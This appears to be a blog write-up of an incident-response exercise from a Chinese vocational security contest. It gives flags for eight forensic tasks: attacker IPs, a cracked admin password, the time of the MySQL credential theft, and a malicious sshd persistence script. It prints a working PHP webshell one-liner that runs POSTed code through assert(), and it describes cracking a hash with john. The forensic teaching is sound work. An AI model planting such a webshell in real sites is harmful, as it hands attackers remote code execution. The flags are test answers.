某省职业院校技能大赛 高职组“信息安全管理与评估”赛项第二部分:应急响应
!!!需要环境可私信博主!!!
!!!若有错误欢迎指正!:)
| 序号 | 任务要求 |
| 1 | 提交攻击者的两个内网IP地址 |
| 2 | 提交网站管理员用户的用户名和密码 |
| 3 | 提交黑客得到 mysql 服务的 root 账号密码的时间 |
| 4 | 查找黑客在WEB应用中写入的恶意代码,提交文件绝对路径 |
| 5 | 查找黑客在WEB应用中写入的恶意代码,提交最简单的形式 (格式:<?php xxxx?>) |
| 6 | 分析攻击者的提权手法,提交攻击者通过哪一个指令成功提权 |
| 7 | 服务器内与动态恶意程序相关的三个文件绝对路径 |
| 8 | 恶意程序对外连接的目的IP地址 |
目录
1、提交攻击者的两个内网IP地址
2、提交网站管理员用户的用户名和密码
3、提交黑客得到mysql服务的root账号密码的时间
4、查找黑客在WEB应用中写入的恶意代码,提交文件绝对路径
5、查找黑客在WEB应用中写入的恶意代码,提交最简单的形式(格式: )
6、分析攻击者的提权手法,提交攻击者通过哪一个指令成功提权
7、服务器内与动态恶意程序相关的三个文件绝对路径
8、恶意程序对外连接的目的IP地址
1、提交攻击者的两个内网IP地址
筛选出日志中出现的IP地址并进行排序
cat access_log* | awk '{print $1}' | sort | uniq -c | sort -nr
这里我查看了几个IP的流量最终发现 192.168.21.1 和192.168.21.137 存在攻击行为
flag{192.168.21.1,192.168.21.137}
2、提交网站管理员用户的用户名和密码
在本地网站文件中,全局搜素查看存放数据库账号密码的文件
grep -rE "username|password|databases" ../
发现一个 settings.php 文件内容似乎与数据库相关,查看内容找到了数据库的账号和密码
使用账号密码登录到本地数据库中,注意这里需要加上 127.0.0.1 才可以连接到数据库中
查库查表最后菜 users 表中发现 admin 的账户和加密的密码
将密码 copy 出来,使用 john 工具进行破解,最后得到密码为 1111
flag{admin:1111}
3、提交黑客得到mysql服务的root账号密码的时间
继续审计日志文件,可以发现攻击者有几条日志的内容进行了base64加密
解码base64内容,发现黑客正在读取服务器数据库的账号密码信息,所以确定时间为:30/Jun/2020:04:09:12
flag{30/Jun/2020:04:09:12}
4、查找黑客在WEB应用中写入的恶意代码,提交文件绝对路径
查看日志的时候发现这样的一大段可疑流量
丢入Cyber进行解码后发现是使用取反 ~ 运算的变形webshell,所以确定该文件是黑客写入的恶意代码
详细可了解:不包含数字字母的WebShell - FreeBuf网络安全行业门户
查找一下文件存储的位置
flag{/var/www/html/cron.php}
5、查找黑客在WEB应用中写入的恶意代码,提交最简单的形式(格式:<?php xxxx?>)
最终的格式为 assert($_POST[_]);
flag{<?php assert($_POST[_]); ?>}
6、分析攻击者的提权手法,提交攻击者通过哪一个指令成功提权
分析这条日志内容可以发现攻击者利用的是 find 提权
7、服务器内与动态恶意程序相关的三个文件绝对路径
使用 pstree 查看系统运行的程序
发现 sshd 进程下直接生成了一个 sleep 命令不同寻常,查看 sshd 文件
其中有一个永真的循环脚本,来消耗网络资源,再有 ssh 来调用
所以这里与动态恶意程序相关的三个文件绝对路径为:/etc/ssh/sshd,/bin/sshd,/usr/lib/systemd/system/ssh.service
flag{/etc/ssh/sshd,/bin/sshd,/usr/lib/systemd/system/ssh.service}
8、恶意程序对外连接的目的IP地址
使用 netstat 命令查看网络端口状态
flag{47.113.101.105}